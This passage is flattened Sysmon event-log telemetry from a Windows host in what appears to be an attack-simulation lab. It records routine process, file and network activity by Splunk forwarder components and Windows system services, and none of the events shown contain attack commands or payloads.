Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200040Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E603-6040-CD4D-00000000AD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200039Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:03.222{5ABCFE62-E603-6040-CD4D-00000000AD01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200061Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:04.831{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51F71C464BCCB0C6D7A98D454BAA6564,SHA256=5BED429CA26560F82C70FAD1D754976D21637E810DF16C022477583BB602FFEF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200060Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:00.450{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64664- 23542300x80000000000000002200059Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:04.378{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81A64F6793DF628427A969E88685FBCC,SHA256=7914DB85F73DCFD45012D640E2663191ED98CC7AE77F0C9B83F21E4C23D5785C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200063Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:00.982{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55098-false10.0.1.12-8000- 23542300x80000000000000002200062Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:05.394{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FEB7E1848D6273F7DF7147B5DDA0BED,SHA256=0F0BFA2A209F1D98CBCC3DAF163D6487F8F9FA9F4DD6B116DF02BF7F353BD429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200065Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:06.691{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200064Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:06.394{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05597FB2C1366075A5C5CD635E66F1A8,SHA256=7669837CBCA439D30400F58031C7F62D34C1B64493C7CAEDC30550400E729F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200067Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:07.675{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B8865A09339406EC9792E99D0A4B721,SHA256=D8C0732404871AEED3F872B06944B259C11EF13C74B0FB3062A818AA9F37965D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200066Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:07.409{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F1B24B2828D9060834DA7CCB3CBA4D7,SHA256=D4822A938A0B4228A05DCF203C9C76B3FD724ECE0B793997CEF3ABF26C466EE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200069Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:08.425{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2CC389C997266C9139B7E27E1D44E4B,SHA256=AED203A8079D594B2721A5B3DEA54240614123EB577C7223D08EA9BEFFB309B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200068Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:04.513{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55099-false10.0.1.12-8089- 23542300x80000000000000002200071Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:09.441{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A205CBEF39FE29A815E24481DFC081D,SHA256=209B2598F9E36D0B0782FEAEB6DDCD6A8E6839B280EBE8FFF28C5EC33208432E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200070Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:09.253{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7755DFADED57E407C14C859BF7F1490,SHA256=530AC33F27D035CB619FC9CE2EBB615BB212C850C4D857AEEFD122C9B96FBA96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200074Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:10.644{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B203586DCBA566D81BC98761A9AC7611,SHA256=41F7F5FBD3BAB1EDC125C893F2658377E4CE6C6ACB68F7E8B5909A59C2745BAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200073Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:10.441{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5810421E2C015B2FD45357AF88E478DB,SHA256=26A4C3CCDF82975187960FB1FB1EFB52ECE9EECDC7A3EBA2575C5717DF8C2C83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200072Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:06.060{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55100-false10.0.1.12-8000- 354300x80000000000000002200076Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:07.483{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-52227-true2001:500:1:0:0:0:0:53h.root-servers.net53domain 23542300x80000000000000002200075Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:11.472{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B287B9830B21760661667B6FA40ADDA0,SHA256=394257E27ED59BA1B9516F359160C86A1388E6778D250CE315162A29F5A2A8E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200077Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:12.519{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EBB585D874D1ECF546C2A257EF4EE4E,SHA256=B971CC9BDBEFD7781D430434F17F2FA0809033F6CBA03CC0D5CA8A54DA5EBFDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200078Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:13.628{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46EC83B639D16678C2589AC8BB7CB90E,SHA256=552B246D75655FF5E3E1BCF664DD9408313684EF670536873C63841FB95F3536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200079Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:14.659{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1E1B72A2E6B73DEDC99443FBC38A598,SHA256=86C0D839F297C6B7013B66420536201DCF9786E117F9AB5E5186692C4568AB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200081Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:15.659{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5C2A503DFF335AFD430891E4CE0DE91,SHA256=11DA0677E24420B1AD31238FD6B39B1B3024B3763870211E3A15F1CB4E107ED6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200080Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:15.253{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BCF3ADAE04BB87D6F6F7FEAD32FCFC1,SHA256=846099A015CAD4C8AE332AC5AD24C4DBB8D19CD3B3247ED12E3881F323DA3FE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200083Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:16.675{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF506B6D780253B3CAE6B06FC186DD2,SHA256=46AC5C882021B52C7F20F9CEDF69E2D21D7A29268644399DB8AB79CBE56ADD7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200082Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:11.873{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55101-false10.0.1.12-8000- 10341000x80000000000000002200093Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.706{5ABCFE62-E611-6040-CF4D-00000000AD01}20206884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200092Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.691{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6659C1F011EB194063EC8FD4464B6554,SHA256=C823135FE58C90C0405087A889548AED88919E6402D53233A0DB00E13C08C6FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200091Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E611-6040-CF4D-00000000AD01}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200090Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200089Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200088Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200087Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200086Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E611-6040-CF4D-00000000AD01}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200085Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E611-6040-CF4D-00000000AD01}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200084Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:17.566{5ABCFE62-E611-6040-CF4D-00000000AD01}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002200111Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.909{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E612-6040-D14D-00000000AD01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200110Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.909{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200109Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.909{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200108Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 